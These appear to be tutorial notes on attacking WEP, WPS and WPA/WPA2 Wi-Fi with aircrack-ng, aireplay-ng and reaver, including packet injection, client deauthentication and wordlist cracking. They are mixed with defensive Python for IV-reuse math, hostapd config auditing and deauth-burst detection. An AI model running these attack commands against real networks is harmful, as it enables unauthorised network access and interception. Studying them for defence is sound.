Cracking WEP


WEP uses the RC4 algorithm: each packet is encrypted at the Access Point and decrypted at the client.

Each packet carries a unique 24-bit Initialization Vector (IV), which is included in the packet in plain text.

Because the IV is short, IVs repeat on a busy network. We collect packets with the same IV and use aircrack-ng to determine the WEP key using statistical attacks.

The more IVs collected, the more likely the key can be cracked.
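To make the IV-repeat point concrete, here is an added Python example (not part of the original notes) that computes the birthday bound for a 24-bit IV space and flags IV reuse in a stream of captured IVs, which is what a wireless monitor would alert on. The IV list is constructed for illustration; the function names are mine.

```python
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible WEP IVs


def collision_probability(n_packets, space=IV_SPACE):
    """Birthday-bound probability that at least two of n_packets share an IV.

    Assumes IVs are drawn uniformly at random, which is the best case for
    WEP; a card that uses a sequential or poorly seeded IV counter repeats
    sooner."""
    if n_packets < 2:
        return 0.0
    return 1.0 - math.exp(-n_packets * (n_packets - 1) / (2.0 * space))


def packets_for_probability(p, space=IV_SPACE):
    """Approximate number of packets after which the chance of an IV repeat
    reaches p (inverse of the birthday bound above)."""
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - p)))


def find_iv_reuse(ivs):
    """Map each repeated IV to the packet indexes it appeared at.

    Two WEP frames with the same IV were encrypted under the same RC4
    keystream, which is the condition the statistical attacks rely on, so a
    monitoring tool can alert on any repeat."""
    seen = {}
    for idx, iv in enumerate(ivs):
        seen.setdefault(iv, []).append(idx)
    return {iv: idxs for iv, idxs in seen.items() if len(idxs) > 1}


# Constructed sample: seven IVs as a monitor might log them (not real capture data).
SAMPLE_IVS = [0x0A1B2C, 0x0A1B2D, 0x3F0001, 0x0A1B2C, 0x112233, 0x3F0001, 0x0A1B2C]

if __name__ == "__main__":
    for n in (1000, 5000, 20000):
        print(f"{n:>6} packets: P(IV repeat) = {collision_probability(n):.3f}")
    print("50% chance of a repeat after about", packets_for_probability(0.5), "packets")
    print("reused IVs in sample:",
          {hex(iv): idxs for iv, idxs in find_iv_reuse(SAMPLE_IVS).items()})
```

With 2^24 possible IVs the 50% point lands near 4,800 packets, which a busy network produces in seconds; that is the whole reason the #Data count in airodump-ng matters.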

airodump-ng wlan0mon

airodump-ng --bssid 00:00:00:00:00:00 --channel 2 --write output wlan0mon

aircrack-ng output-01.cap

#Data – number of packets with unique/new IVs

If the AP has no clients, we have to inject packets into the traffic in order to force the router to create new packets with new IVs.

aireplay-ng --fakeauth 0 -a [target MAC] -h [your MAC] [interface]

If authentication was successful, the value of the AUTH column changes to OPN.

Packet injection: ARP request replay

After successfully associating with the target AP, we wait for an ARP packet, capture it and inject it into the traffic. The AP is forced to create a new packet with a new IV; we capture this packet and inject it too. Repeat until enough IVs have been collected.

aireplay-ng --arpreplay -b [target MAC] -h [your MAC] [interface]


airodump-ng --bssid 00:00:00:00:00:00 --channel 2 --write arpreplaytest wlan0mon

aireplay-ng --fakeauth 0 -a 00:00:00:00:00:00 -h 12:13:14:15:16:17 wlan0mon

aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 12:13:14:15:16:17 wlan0mon

aircrack-ng arpreplaytest-01.cap

WPA cracking

WPA was designed to address the issues in WEP and uses better encryption.

The main issue in WEP is the short IV, which means IVs can be repeated and the key cracked.

In WPA each packet is encrypted with a unique temporary key, so the number of data packets we collect is irrelevant.

WPA and WPA2 are similar; the difference is that WPA2 uses the CCMP algorithm.

WPS feature

Allows users to connect to a WPS-enabled network using a WPS button or by clicking on the WPS functionality.

Authentication is done using an 8-digit PIN. This means we can brute force the PIN in less than 10 hours.

To recover the WPA key from the PIN we use the reaver tool.

WPS Locked – the WPS attack can't be used, because the AP will lock itself after a number of attempts.

wash -i mon0 // scan tool

reaver -b 00:49:10:90:2D:EE -c 11 -i wlan0mon

reaver --delay=<sec>

reaver --lock-delay=<sec>

reaver -D //daemonize reaver
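From the defender's side, the WPA/CCMP and WPS notes above map onto a handful of hostapd.conf parameters. The following added Python example (not part of the original notes, and not hostapd's own code) parses a hostapd-style config and reports the weak settings, with a hardened version beside it. Both config snippets are constructed; the parameter names (wpa, wpa_pairwise, rsn_pairwise, wps_state, ap_pin, ieee80211w, wep_key0) are real hostapd options, and the audit rules are my own.

```python
# Constructed "everything weak at once" config; not a real AP's configuration.
WEAK_CONF = """\
interface=wlan0
ssid=example-net
channel=6
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wps_state=2
ap_pin=12345670
ieee80211w=0
"""

# Constructed hardened counterpart: WPA2 only, CCMP only, WPS off, PMF required.
HARDENED_CONF = """\
interface=wlan0
ssid=example-net
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wps_state=0
ieee80211w=2
"""


def parse_hostapd(text):
    """Parse key=value lines, ignoring blanks and # comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit(conf):
    """Return a list of findings for the settings the notes above attack."""
    findings = []
    has_wep = "wep_default_key" in conf or any(k.startswith("wep_key") for k in conf)
    if has_wep:
        findings.append("WEP keys configured: 24-bit IVs repeat and the key is recoverable")
    wpa = conf.get("wpa", "0")
    if wpa == "0" and not has_wep:
        findings.append("open network: no encryption configured")
    if wpa in ("1", "3"):
        findings.append("WPA (TKIP-era) mode enabled; prefer wpa=2 (WPA2/RSN)")
    pairwise = set((conf.get("wpa_pairwise", "") + " " + conf.get("rsn_pairwise", "")).split())
    if "TKIP" in pairwise:
        findings.append("TKIP pairwise cipher allowed; use CCMP only")
    if conf.get("wps_state", "0") != "0":
        findings.append("WPS enabled: the 8-digit PIN method is brute-forceable; set wps_state=0")
    if "ap_pin" in conf:
        findings.append("static WPS AP PIN configured; remove ap_pin")
    if conf.get("ieee80211w", "0") != "2":
        findings.append("management frame protection not required (ieee80211w=2); "
                        "deauth frames can be forged to force handshakes")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit(parse_hostapd(text)) or ['no findings']}")
```

ieee80211w=2 only helps clients that support PMF, so on a mixed fleet the practical setting is often 1 (optional) while the deauth detection below still runs.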

WPA/WPA2 Cracking

The only packets that contain information that helps crack the password are the handshake packets.

Every time a client connects to the AP, a four-way handshake occurs between the client and the AP.

By capturing the handshake we can use aircrack-ng to launch a wordlist attack against it to determine the key.

Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng… ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap
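The deauthentication step in the list above is exactly what a wireless IDS watches for. As an added example (not part of the original notes), this Python function runs a sliding-window count of deauth/disassociation frames per (source, destination) pair over a constructed list of management frames that reuses the placeholder MAC addresses from the commands above; the frame tuple layout, the one-second window and the threshold of five are assumptions for illustration.

```python
from collections import defaultdict

AP = "9C:5C:8E:C9:AB:C0"      # placeholder BSSID from the notes above
CLIENT = "64:BC:0C:48:97:F7"  # placeholder client MAC from the notes above
BCAST = "FF:FF:FF:FF:FF:FF"

# Constructed management-frame log as (timestamp_s, subtype, src, dst):
# six seconds of normal beacons, a burst of 12 forged deauths in ~0.1 s,
# and one legitimate deauth from a client that simply leaves the network.
SAMPLE_FRAMES = (
    [(round(0.1 * i, 2), "beacon", AP, BCAST) for i in range(60)]
    + [(round(1.0 + 0.01 * i, 2), "deauth", AP, CLIENT) for i in range(12)]
    + [(5.0, "deauth", CLIENT, AP)]
)


def detect_deauth_bursts(frames, window_s=1.0, threshold=5):
    """Return (src, dst, peak_count) for every address pair whose deauth or
    disassoc frames reach `threshold` inside any `window_s` sliding window.

    A single deauth is normal (a client leaving); a burst aimed at one client
    is the signature of the forced-handshake step."""
    by_pair = defaultdict(list)
    for ts, subtype, src, dst in frames:
        if subtype in ("deauth", "disassoc"):
            by_pair[(src, dst)].append(ts)

    alerts = []
    for (src, dst), times in by_pair.items():
        times.sort()
        peak, start = 0, 0
        for end, ts in enumerate(times):
            while ts - times[start] > window_s:   # slide window start forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((src, dst, peak))
    return alerts


if __name__ == "__main__":
    for src, dst, count in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {src} -> {dst}, {count} frames within 1 s")
```

In practice the frame tuples would come from a monitor-mode capture; the per-pair grouping is what keeps a genuine disconnect from one client from triggering the alert.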